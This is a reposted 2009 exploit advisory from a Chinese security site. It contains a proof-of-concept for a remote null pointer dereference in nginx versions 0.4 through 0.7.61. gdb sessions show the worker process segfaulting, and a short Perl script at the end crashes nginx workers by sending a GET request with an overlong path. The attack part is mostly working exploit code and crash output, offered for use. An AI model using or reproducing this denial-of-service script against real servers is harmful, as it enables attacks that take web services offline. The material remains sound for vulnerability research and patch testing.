首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
nginx remote null pointer dereferencing vulnerability(POC)
来源:zeuspenguin[at]gmail.com 作者:penguin 发布时间:2009-10-26  
debian:~# uname -a Linux debian 2.6.18-6-686 #1 SMP Thu Aug 20 21:56:59 UTC
2009 i686 GNU/Linux
debian:~# cat /etc/issue
Debian GNU/Linux 4.0 \n \l

debian:~# dpkg -l|grep nginx
ii nginx 0.4.13-2+etch2 small, but very powerful and efficient
debian:~# ps xauwww|grep worker|grep -v grep
www-data 3577 0.0 0.9 2688 928 ? S 01:50 0:00 nginx: worker process
debian:~# gdb -p 3577
GNU gdb 6.4.90-debian
Copyright (C) 2006 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are

welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i486-linux-gnu".
Attaching to process 3577
Reading symbols from /usr/sbin/nginx...(no debugging symbols found)...done.
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
Reading symbols from /lib/tls/i686/cmov/libcrypt.so.1...(no debugging
symbols found)...done.
Loaded symbols for /lib/tls/i686/cmov/libcrypt.so.1
Reading symbols from /usr/lib/libpcre.so.3...(no debugging symbols
found)...done.
Loaded symbols for /usr/lib/libpcre.so.3
Reading symbols from /usr/lib/libz.so.1...(no debugging symbols
found)...done.
Loaded symbols for /usr/lib/libz.so.1
Reading symbols from /lib/tls/i686/cmov/libc.so.6...
(no debugging symbols found)...done.
Loaded symbols for /lib/tls/i686/cmov/libc.so.6
Reading symbols from /lib/ld-linux.so.2...(no debugging symbols
found)...done.
Loaded symbols for /lib/ld-linux.so.2
Reading symbols from /lib/tls/i686/cmov/libnss_compat.so.2...(no debugging
symbols found)...done.
Loaded symbols for /lib/tls/i686/cmov/libnss_compat.so.2
Reading symbols from /lib/tls/i686/cmov/libnsl.so.1...(no debugging symbols
found)...done.
Loaded symbols for /lib/tls/i686/cmov/libnsl.so.1
Reading symbols from /lib/tls/i686/cmov/libnss_nis.so.2...
(no debugging symbols found)...done.
Loaded symbols for /lib/tls/i686/cmov/libnss_nis.so.2
Reading symbols from /lib/tls/i686/cmov/libnss_files.so.2...(no debugging
symbols found)...done.
Loaded symbols for /lib/tls/i686/cmov/libnss_files.so.2
Failed to read a valid object file image from memory.
0xb7f06410 in ?? ()
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x08068f23 in ?? ()
(gdb) bt
#0 0x08068f23 in ?? ()
#1 0x080b0540 in ?? ()
#2 0x080a54e4 in ?? ()
#3 0x00000000 in ?? ()
(gdb) i r
eax 0x6d4 1748
ecx 0xbff21028 -1074655192
edx 0x80b1794 134944660
ebx 0x80b0540 134939968
esp 0xbff21880 0xbff21880
ebp 0xbff218d8 0xbff218d8
esi 0x80b5630 134960688
edi 0x80b0540 134939968
eip 0x8068f23 0x8068f23 <__gmon_start__@plt+126827>
eflags 0x10206 [ PF IF RF ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
(gdb) q
The program is running. Quit anyway (and detach it)? (y or n) y
Detaching from program: /usr/sbin/nginx, process 3577
debian:~#

in nginx error log we can see :
2009/10/15 01:53:24 [alert] 2477#0: worker process 3577 exited on signal 11

===============================

here is same test on nginx compiled with debug :

(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
ngx_http_process_request_headers (rev=0x80c95d8) at
src/http/ngx_http_request.c:793
793 header.data[header.len++] = '.';
(gdb) bt
#0 ngx_http_process_request_headers (rev=0x80c95d8) at
src/http/ngx_http_request.c:793
#1 0x08069c63 in ngx_http_process_request_line (rev=0x80c95d8) at
src/http/ngx_http_request.c:702
#2 0x080668ff in ngx_http_init_request (rev=0x80c95d8) at
src/http/ngx_http_request.c:446
#3 0x0805f67e in ngx_epoll_process_events (cycle=0x80a59e8, timer=60000,
flags=<value optimized out>)
at src/event/modules/ngx_epoll_module.c:518
#4 0x08056712 in ngx_process_events_and_timers (cycle=0x80a59e8) at
src/event/ngx_event.c:245
#5 0x0805cebd in ngx_worker_process_cycle (cycle=0x80a59e8, data=0x0) at
src/os/unix/ngx_process_cycle.c:728
#6 0x0805b9b1 in ngx_spawn_process (cycle=0x80a59e8, proc=0x805c8a2
<ngx_worker_process_cycle>, data=0x0,
name=0x808e46b "worker process", respawn=-2) at
src/os/unix/ngx_process.c:187
#7 0x0805c470 in ngx_start_worker_processes (cycle=0x80a59e8, n=1, type=-2)
at src/os/unix/ngx_process_cycle.c:327
#8 0x0805d442 in ngx_master_process_cycle (cycle=0x80a59e8) at
src/os/unix/ngx_process_cycle.c:119
#9 0x0804ae5b in main (argc=1, argv=0xbfd72ac4) at src/core/nginx.c:332
(gdb) i r $eip
eip 0x8068e52 0x8068e52 <ngx_http_process_request_headers+273>
(gdb)

===============================

tested on versions 0.7.0 <= 0.7.61, 0.6.0 <= 0.6.38, 0.5.0 <= 0.5.37, 0.4.0
<= 0.4.14

================================
here is POC:

#!/usr/bin/perl
use IO::Socket;
if ($#ARGV != 0) {
print "Usage: ./nginx.pl <hostname>\n";
exit;}
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => '80',
Proto => 'tcp');
$mysize = 4079;
$mymsg = "o" x $mysize;
print $sock "GET /$mymsg HTTP/1.1\r\n\r\n";

while(<$sock>) {
print;
}

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Eureka Mail Client version 2.2
·Pegasus Mail Client version 4.
·RunCms v.2M1 /modules/forum/po
·Novell eDirectory version 8.8
·GPG2/Kleopatra 2.0.11 - Malfor
·TFTgallery 0.13 is vulnerable
·Alleycode HTML Editor 2.21 Loc
·RunCMS version 2M1 store() rem
·Websense Email Security Cross
·Cherokee web server version 0.
·Websense Email Security Web Ad
·xp-AntiSpy <= 3.9.7-4 Local (.
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved